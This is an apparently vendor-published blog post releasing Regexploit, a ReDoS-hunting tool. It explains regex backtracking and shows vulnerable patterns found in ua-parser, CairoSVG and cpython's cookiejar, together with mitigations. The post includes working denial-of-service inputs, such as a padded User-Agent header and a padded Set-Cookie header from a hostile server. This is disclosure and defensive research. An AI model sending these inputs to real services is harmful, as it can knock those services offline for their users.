Regexploit: DoS-able Regular Expressions


When thinking of Denial of Service (DoS), we often focus on Distributed Denial of Service (DDoS), where millions of zombie machines overload a service by launching a tsunami of data. However, by abusing the algorithms a web application uses, an attacker can bring a server to its knees with as little as a single request. Doing that requires finding algorithms which have terrible performance under certain conditions, and then triggering those conditions. One widespread and frequently vulnerable area is the misuse of regular expressions (regexes).

Regular expressions are used for all manner of text-processing tasks. They may seem to run fine, but if a regex is vulnerable to Regular Expression Denial of Service (ReDoS), it may be possible to craft input which causes the CPU to run at 100% for years.

In this blog post, we’re releasing a new tool to analyse regular expressions and hunt for ReDoS vulnerabilities. Our heuristic has proven extremely effective, as demonstrated by the many vulnerabilities discovered across popular npm, Python and Ruby dependencies.

Check your regexes with Regexploit

🚀 @doyensec/regexploit - pip install regexploit and find some bugs.

Backtracking

To get into the topic, let’s review how the regex matching engines in languages like Python, Perl, Ruby, C# and JavaScript work. Let’s imagine that we’re using this deliberately silly regex to extract version numbers:

(.+)\.(.+)\.(.+)

That will correctly process something like 123.456.789, but it’s a pretty inefficient regex. How does the matching process work?

The first .+ capture group greedily matches all the way to the end of the string as dot matches every character.

123.456.789

$1="123.456.789". The matcher then looks for a literal dot character. Unable to find it, it tries removing one character at a time from the first .+

123.456.789

until it successfully matches a dot - $1="123.456"

123.456.789

The second capture group matches the final three digits $2="789", but we need another dot so it has to backtrack.

123.456.789

Hmmm… it seems that maybe the match for capture group 1 is incorrect, let’s try backtracking.

123.456.789

OK let’s try with $1="123", and let’s match group 2 greedily all the way to the end.

123.456.789

$2="456.789" but now there’s no dot! That can’t be the correct group 2…

123.456.789

Finally we have a successful match: $1="123", $2="456", $3="789"

As you can hopefully see, there can be a lot of back-and-forth in the regex matching process. This backtracking is due to the ambiguous nature of the regex, where input can be matched in different ways. If a regex isn’t well-designed, malicious input can cause a much more resource-intensive backtracking loop than this.
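The ambiguity can be seen directly with Python's standard re module. This is a minimal sketch: the second input ("1.2.3.4") and the stricter STRICT pattern are illustrative assumptions, not part of the walkthrough above.

```python
import re

SILLY = re.compile(r"(.+)\.(.+)\.(.+)")
# Hypothetical stricter alternative: digits cannot also match the dots,
# so there is only one way to split the input.
STRICT = re.compile(r"(\d+)\.(\d+)\.(\d+)")

# The walkthrough above: after backtracking, each group holds one number.
print(SILLY.fullmatch("123.456.789").groups())  # ('123', '456', '789')

# With an extra dot, the greedy first group keeps as much as it can.
print(SILLY.fullmatch("1.2.3.4").groups())      # ('1.2', '3', '4')

# The stricter pattern has no ambiguity to explore and rejects the input.
print(STRICT.fullmatch("1.2.3.4"))              # None
```

Because the dot matches both digits and the separator, the engine has several candidate splits to try; narrowing each group to \d+ removes that freedom.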

If backtracking takes an extreme amount of time, it will cause a Denial of Service, as happened to Cloudflare in 2019. In runtimes like Node.js, the event loop will be blocked, which stalls all timers, awaits, requests and responses until regex processing completes.

ReDoS example

Now we can look at a ReDoS example. The ua-parser package contains a giant list of regexes for deciphering browser User-Agent headers. One of the regular expressions reported in CVE-2020-5243 was:

; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)

If we look closer at the end part we can see three overlapping repeating groups:

\d+[^\);]+[^\);]*\)

Digit characters are matched by \d and by [^\);]. If a string of N digits enters that section, there are ½(N-1)N possible ways to split it up between the \d+, [^\);]+ and [^\);]* groups. The key to causing ReDoS is to supply input which doesn’t successfully match, such as by not ending our malicious input with a closing parenthesis. The regex engine will backtrack and try all possible ways of matching the digits in the hope of then finding a ).
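The ½(N-1)N figure can be checked by brute force. The sketch below only enumerates the splits; the function name count_splits is made up for illustration, and it does not model the engine's actual step count.

```python
def count_splits(n):
    """Count ways to share n digits between three consecutive repeats.

    The first two repeats need at least one digit each (the `+` groups);
    the third may be empty (the `*` group).
    """
    ways = 0
    for first in range(1, n + 1):
        for second in range(1, n - first + 1):
            # Whatever is left (possibly nothing) goes to the third repeat.
            ways += 1
    return ways


for n in (3, 10, 100):
    # Compare the enumeration with the closed form quoted above.
    assert count_splits(n) == (n - 1) * n // 2
    print(n, count_splits(n))
```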

This visualisation of the matching steps was produced by emitting verbose debugging from cpython’s regex engine using my cpython fork.

Regexploit

Today, we are releasing a tool called Regexploit to extract regexes from code, scan them and find ReDoS.

Several tools already exist to find regexes with exponential worst case complexity (regexes of the form (a+)+b), but cubic complexity regexes (a+a+a+b) can still be damaging. Regexploit walks through the regex and tries to find ambiguities where a single character could be captured by multiple repeating parts. Then it looks for a way to make the regular expression not match, so that the regex engine has to backtrack.

The regexploit script allows you to enter regexes via stdin. If the regex looks OK it will say “No ReDoS found”. With the regex above it shows the vulnerability:

Worst-case complexity: 3 ⭐⭐⭐ (cubic)
Repeated character: [[0-9]]
Example: ';0 Build/HuaweiA' + '0' * 3456

The final line of output gives a recipe for creating a User-Agent header which will cause ReDoS on sites using old versions of ua-parser, likely resulting in a Bad Gateway error.

User-Agent: ;0 Build/HuaweiA0000000000000000000000000000...
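To get a feel for the growth, the recipe can be timed against the quoted pattern with Python's re module. This is a rough sketch, not how ua-parser itself invokes the regex: the helper names payload and time_search are invented here, and the sizes are kept small so the loop finishes quickly. Absolute timings depend on the machine.

```python
import re
import time

# Pattern as quoted above from CVE-2020-5243.
HUAWEI = re.compile(
    r"; *([^;/]+) Build[/ ]Huawei(MT1-U06|[A-Z]+\d+[^\);]+)[^\);]*\)"
)


def payload(n):
    """Build the Regexploit recipe with n repeated digits."""
    return ";0 Build/HuaweiA" + "0" * n


def time_search(n):
    """Return the seconds spent failing to match a payload of n digits."""
    start = time.perf_counter()
    result = HUAWEI.search(payload(n))
    elapsed = time.perf_counter() - start
    assert result is None  # no closing parenthesis, so it cannot match
    return elapsed


if __name__ == "__main__":
    for n in (50, 100, 200):
        print(f"{n:4d} digits: {time_search(n):.4f}s")
```

With cubic behaviour, doubling the number of digits should multiply the time by roughly eight, which is why a few thousand characters are enough to stall a request.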

To scan your source code, there is built-in support for extracting regexes from Python, JavaScript, TypeScript, C#, JSON and YAML. If you are able to extract regexes from other languages, they can be piped in and analysed.

Once a vulnerable regular expression is found, it does still require some manual investigation. If it’s not possible for untrusted input to reach the regular expression, then it likely does not represent a security issue. In some cases, a prefix or suffix might be required to get the payload to the right place.

ReDoS Survey

So what kind of ReDoS issues are out there? We used Regexploit to analyse the top few thousand npm and PyPI libraries (grabbed from the libraries.io API) to find out.

We tried to exclude build tools and test frameworks, as bugs in these are unlikely to have any security impact. When a vulnerable regex was found, we then needed to figure out how untrusted input could reach it.

Results

The most problematic area was the use of regexes to parse programming or markup languages. Using regular expressions to parse some languages e.g. Markdown, CSS, Matlab or SVG is fraught with danger. Such languages have grammars which are designed to be processed by specialised lexers and parsers. Trying to perform the task with regexes leads to overly complicated patterns which are difficult for mere mortals to read.

A recurring source of vulnerabilities was the handling of optional whitespace. As an example, let’s take the Python module CairoSVG which used the following regex:

rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)

$ regexploit-py .env/lib/python3.9/site-packages/cairosvg/
Vulnerable regex in .env/lib/python3.9/site-packages/cairosvg/colors.py #190
Pattern: rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)
Context: RGBA = re.compile(r'rgba\([ \n\r\t]*(.+?)[ \n\r\t]*\)')
---
Starriness: 3 ⭐⭐⭐ (cubic)
Repeated character: [20,09,0a,0d]
Example: 'rgba(' + ' ' * 3456

The developer wants to find strings like rgba(   100,200, 10, 0.5   ) and extract the middle part without surrounding spaces. Unfortunately, the .+? in the middle also accepts spaces. If the string does not end with a closing parenthesis, the regex will not match, and we can get O(n³) backtracking.

Let’s take a look at the matching process with the input "rgba(" + " " * 19:

What a load of wasted CPU cycles!

A fun ReDoS bug was discovered in cpython’s http.cookiejar with this gorgeous regex:

Pattern: ^
    (\d\d?)            # day
    (?:\s+|[-\/])
    (\w+)              # month
    (?:\s+|[-\/])
    (\d+)              # year
    (?:
      (?:\s+|:)        # separator before clock
      (\d\d?):(\d\d)   # hour:min
      (?::(\d\d))?     # optional seconds
    )?                 # optional clock
    \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
    \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
    \s*$
Context: LOOSE_HTTP_DATE_RE = re.compile(
---
Starriness: 3 ⭐⭐⭐
Repeated character: [SPACE]
Final character to cause backtracking: [^SPACE]
Example: '0 a 0' + ' ' * 3456 + '0'

It was used when processing cookie expiry dates like Fri, 08 Jan 2021 23:20:00 GMT, but with compatibility for some deprecated date formats. The last 5 lines of the regex pattern contain three \s* groups separated by optional groups, so we have a cubic ReDoS.
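The pattern can be reproduced locally to confirm that the Regexploit example is rejected only after heavy backtracking. In this sketch the re.X flag is an assumption (the pattern needs verbose mode for its comments, but the flags are not shown in the output above), and regexploit_example is a made-up helper name. The pattern is defined here rather than imported, since the standard library copy may differ from the one quoted.

```python
import re
import time

# Pattern as printed above; re.X (verbose mode) is assumed so that the
# inline comments and layout whitespace are ignored.
LOOSE_HTTP_DATE_RE = re.compile(
    r"""^
    (\d\d?)            # day
    (?:\s+|[-\/])
    (\w+)              # month
    (?:\s+|[-\/])
    (\d+)              # year
    (?:
      (?:\s+|:)        # separator before clock
      (\d\d?):(\d\d)   # hour:min
      (?::(\d\d))?     # optional seconds
    )?                 # optional clock
    \s*
    ([-+]?\d{2,4}|(?![APap][Mm]\b)[A-Za-z]+)? # timezone
    \s*
    (?:\(\w+\))?       # ASCII representation of timezone in parens.
    \s*$""",
    re.X,
)


def regexploit_example(spaces):
    """The example from the tool output, with a configurable number of spaces."""
    return "0 a 0" + " " * spaces + "0"


if __name__ == "__main__":
    # A well-formed date matches immediately.
    print(LOOSE_HTTP_DATE_RE.search("08 Jan 2021 23:20:00 GMT").groups())
    # The crafted input never matches; time grows quickly with the spaces.
    for n in (50, 100, 200):
        start = time.perf_counter()
        assert LOOSE_HTTP_DATE_RE.search(regexploit_example(n)) is None
        print(f"{n:4d} spaces: {time.perf_counter() - start:.4f}s")
```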

A victim simply making an HTTP request like requests.get('http://evil.server') could be attacked by a remote server responding with Set-Cookie headers of the form:

Set-Cookie: b;Expires=1-c-1                        X

With the maximum 65506 spaces that can be crammed into an HTTP header line in Python, the client will take over a week to finish processing the header.

Again, the issue was designing the regex to handle whitespace between optional sections.

Another point to notice is that, based on the git history, the troublesome regexes we discovered had mostly remained untouched since they first entered the codebase. While it shows that the regexes seem to cause no issues in normal conditions, it perhaps indicates that regexes are too illegible to maintain. If the regex above had no comments to explain what it was supposed to match, who would dare try to alter it? Probably only the guy from xkcd.

xkcd 208: Regular Expressions Sorry, I wanted to shoehorn this comic in somewhere

Mitigations - Safety first

Use a DFA

So why didn’t I bother looking for ReDoS in Golang? Go’s regexp package follows the design of RE2 and does not backtrack.

That design, based on finite automata (DFA) rather than backtracking, was chosen to be safe even if the regular expression itself is untrusted. The guarantee is that matching time is linear in the size of the input, whatever that input is. There was a trade-off though. Depending on your use-case, libraries like re2 may not be the fastest engines. Some regex features, such as backreferences, also had to be dropped. But in the pathological case, regexes won’t be what takes down your website. There are re2 libraries for many languages, so you can use it in preference to Python’s re module.

Don’t do it all with regexes

For the whitespace ambiguity issue, it’s often possible to first use a simple regex and then trim / strip the spaces from either side of the result.
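As a sketch of that idea applied to the rgba example from earlier: the pattern below captures everything up to the first closing parenthesis and leaves the trimming to str.strip. The names RGBA_SIMPLE and extract_rgba_args are hypothetical, and this is not the fix CairoSVG actually shipped; it may also behave differently from the original regex on edge cases such as an empty or whitespace-only argument list.

```python
import re

# Only one repeating part, and it cannot match the closing parenthesis,
# so there is no ambiguity for the engine to explore.
RGBA_SIMPLE = re.compile(r"rgba\(([^)]*)\)")


def extract_rgba_args(text):
    """Return the trimmed contents of the first rgba(...) call, or None."""
    match = RGBA_SIMPLE.search(text)
    if match is None:
        return None
    inner = match.group(1).strip(" \n\r\t")  # trim outside the regex
    return inner or None


print(extract_rgba_args("rgba(   100,200, 10, 0.5   )"))  # 100,200, 10, 0.5
print(extract_rgba_args("rgba(" + " " * 100000))          # None
```

The second call uses the same shape of input that caused cubic backtracking before; here the single repeat is scanned and abandoned in time proportional to the input length.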

Many tiny regexes

In Ruby, the standard library contains StringScanner which helps with “lexical scanning operations”. While the http-cookie gem has many more lines of code than a mega-regex, it avoids ReDoS when parsing Set-Cookie headers. Once each part of the string has been matched, it refuses to backtrack. In some regular expression flavours, you can use “possessive quantifiers” to mark sections as non-backtrackable and achieve a similar effect.
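The same approach can be sketched in Python. The Scanner class below is a hypothetical, stripped-down imitation of the StringScanner idea, not a port of the http-cookie gem, and parse_loose_date handles only a day, month and year rather than the full date grammar shown earlier.

```python
import re


class Scanner:
    """Tiny cursor over a string, loosely modelled on Ruby's StringScanner."""

    def __init__(self, text):
        self.text = text
        self.pos = 0

    def scan(self, pattern):
        """Match pattern at the cursor; advance and return the text, or None."""
        match = re.compile(pattern).match(self.text, self.pos)
        if match is None:
            return None
        self.pos = match.end()  # committed: earlier tokens are never revisited
        return match.group(0)

    def at_end(self):
        return self.pos == len(self.text)


def parse_loose_date(text):
    """Parse 'day sep month sep year' with one tiny regex per token."""
    s = Scanner(text)
    day = s.scan(r"\d\d?")
    if day is None or s.scan(r"\s+|[-/]") is None:
        return None
    month = s.scan(r"[A-Za-z]+")
    if month is None or s.scan(r"\s+|[-/]") is None:
        return None
    year = s.scan(r"\d+")
    if year is None:
        return None
    s.scan(r"\s*")  # trailing whitespace is consumed exactly once
    return (int(day), month, int(year)) if s.at_end() else None


print(parse_loose_date("08 Jan 2021"))             # (8, 'Jan', 2021)
print(parse_loose_date("1-c-1" + " " * 50000 + "X"))  # None
```

Each token is matched once and the cursor only moves forward, so a long run of spaces followed by junk is rejected after a single pass instead of being re-split between several whitespace groups.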

Gotta catch ‘em all 🐛🐞🦠